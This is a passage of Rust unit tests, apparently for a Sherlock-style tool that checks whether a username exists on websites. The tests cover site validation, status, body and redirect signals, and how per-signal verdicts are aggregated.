        s.name = "A".repeat(100);
        let err = s.validate().unwrap_err();
        assert!(err.to_string().contains("longer than"));
    }

    #[test]
    fn validate_accepts_well_formed_regex_check() {
        let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
        s.regex_check = Some("^[a-zA-Z0-9_-]{3,40}$".into());
        assert!(s.validate().is_ok());
    }

    #[test]
    fn validate_tolerates_unsupported_regex_features() {
        // Sherlock-imported regexes occasionally use lookarounds
        // (e.g. `(?!...)`) that Rust's `regex` crate can't compile —
        // those sites should still load, with the username-gate
        // silently disabled rather than rejecting the whole site.
        let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
        s.regex_check = Some("^(?![.-])[a-zA-Z0-9_.-]{3,20}$".into());
        assert!(
            s.validate().is_ok(),
            "lookaround-bearing regex should warn, not reject the site"
        );
    }

    #[test]
    fn signal_status_found_votes_only_on_match() {
        let signal = Signal::StatusFound { codes: vec![200] };
        let probe = Probe {
            status: 200,
            final_url: "https://example.com/alice",
            body: "",
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::Found);
        let probe = Probe {
            status: 404,
            ..probe
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
    }

    #[test]
    fn signal_status_not_found_votes_only_on_match() {
        let signal = Signal::StatusNotFound { codes: vec![404] };
        let probe = Probe {
            status: 404,
            final_url: "",
            body: "",
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
        let probe = Probe {
            status: 200,
            ..probe
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
    }

    /// `BodyPresent` is the positive counterpart of `BodyAbsent`: it votes
    /// `Found` when its text occurs in the body and stays silent otherwise.
    #[test]
    fn signal_body_present_votes_found_when_text_present() {
        let signal = Signal::BodyPresent {
            text: "Welcome alice".into(),
        };
        let probe = Probe {
            status: 200,
            final_url: "",
            body: "<h1>Welcome alice</h1>",
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::Found);
        let probe = Probe {
            body: "<h1>Profile not found</h1>",
            ..probe
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
    }

    #[test]
    fn signal_body_absent_votes_not_found_when_text_present() {
        let signal = Signal::BodyAbsent {
            text: "Profile not found".into(),
        };
        let probe = Probe {
            status: 200,
            final_url: "",
            body: "<h1>Profile not found</h1>",
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
        let probe = Probe {
            body: "<h1>Welcome alice</h1>",
            ..probe
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
    }

    #[test]
    fn signal_redirect_absent_inspects_final_url() {
        let signal = Signal::RedirectAbsent {
            fragment: "/login".into(),
        };
        let probe = Probe {
            status: 200,
            final_url: "https://example.com/login?next=/alice",
            body: "",
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
        let probe = Probe {
            final_url: "https://example.com/alice",
            ..probe
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
    }

    /// Pins the explanation text for every signal variant: the observed
    /// evidence followed by the variant tag in parentheses, with body text
    /// and URL fragments rendered in `Debug` (quoted) form.
    #[test]
    fn describe_match_reports_triggering_evidence() {
        let found = Probe {
            status: 200,
            final_url: "https://example.com/alice",
            body: "<h1>Welcome alice</h1>",
        };
        assert_eq!(
            Signal::StatusFound { codes: vec![200] }.describe_match(&found),
            "HTTP 200 (status_found)"
        );
        assert_eq!(
            Signal::BodyPresent {
                text: "Welcome alice".into()
            }
            .describe_match(&found),
            "body contains \"Welcome alice\" (body_present)"
        );

        let missing = Probe {
            status: 404,
            final_url: "https://example.com/login?next=/alice",
            body: "<h1>Profile not found</h1>",
        };
        assert_eq!(
            Signal::StatusNotFound { codes: vec![404] }.describe_match(&missing),
            "HTTP 404 (status_not_found)"
        );
        assert_eq!(
            Signal::BodyAbsent {
                text: "Profile not found".into()
            }
            .describe_match(&missing),
            "body contains \"Profile not found\" (body_absent)"
        );
        assert_eq!(
            Signal::RedirectAbsent {
                fragment: "/login".into()
            }
            .describe_match(&missing),
            "final URL contains \"/login\" (redirect_absent)"
        );
    }

    #[test]
    fn aggregate_found_when_only_found_signals_fire() {
        let kind = aggregate([SignalVerdict::Found, SignalVerdict::Ambiguous]);
        assert_eq!(kind, MatchKind::Found);
    }

    #[test]
    fn aggregate_not_found_when_only_not_found_signals_fire() {
        let kind = aggregate([SignalVerdict::NotFound, SignalVerdict::Ambiguous]);
        assert_eq!(kind, MatchKind::NotFound);
    }

    #[test]
    fn aggregate_not_found_wins_over_found() {
        // Negative-priority: a NotFound vote outranks a Found vote.
        let kind = aggregate([SignalVerdict::Found, SignalVerdict::NotFound]);
        assert_eq!(kind, MatchKind::NotFound);
    }

    #[test]
    fn aggregate_uncertain_when_no_signals_fire() {
        let kind = aggregate([SignalVerdict::Ambiguous, SignalVerdict::Ambiguous]);
        assert_eq!(kind, MatchKind::Uncertain);
    }

    #[test]
    fn aggregate_empty_is_uncertain() {
        let kind = aggregate(std::iter::empty());
        assert_eq!(kind, MatchKind::Uncertain);
    }

    #[test]
    fn needs_body_is_true_only_for_body_signals() {
        assert!(!Signal::StatusFound { codes: vec![200] }.needs_body());
        assert!(!Signal::StatusNotFound { codes: vec![404] }.needs_body());
        assert!(
            !Signal::RedirectAbsent {
                fragment: "/login".into()
            }
            .needs_body()
        );
        assert!(Signal::BodyPresent { text: "x".into() }.needs_body());
        assert!(Signal::BodyAbsent { text: "x".into() }.needs_body());
    }

    #[test]
    fn deserializes_signal_list() {
        let json = r#"{
            "name": "GitHub",
            "url": "https://github.com/{username}",
            "signals": [
                { "kind": "status_found", "codes": [200] },
                { "kind": "status_not_found", "codes": [404] }
            ]
        }"#;
        let site: Site = serde_json::from_str(json).unwrap();
        assert_eq!(site.name, "GitHub");
        assert_eq!(site.signals.len(), 2);
        site.validate().unwrap();
    }

    proptest::proptest! {
        /// For any mix of per-signal verdicts, aggregation obeys the
        /// negative-priority spec: any NotFound wins; else any Found; else
        /// Uncertain.
        #[test]
        fn aggregate_matches_negative_priority_spec(
            votes in proptest::collection::vec(
                proptest::prop_oneof![
                    proptest::strategy::Just(SignalVerdict::Found),
                    proptest::strategy::Just(SignalVerdict::NotFound),
                    proptest::strategy::Just(SignalVerdict::Ambiguous),
                ],
                0..16,
            ),
        ) {
            let kind = aggregate(votes.iter().copied());
            let expected = if votes.contains(&SignalVerdict::NotFound) {
                MatchKind::NotFound
            } else if votes.contains(&SignalVerdict::Found) {
                MatchKind::Found
            } else {
                MatchKind::Uncertain
            };
            proptest::prop_assert_eq!(kind, expected);
        }
    }
}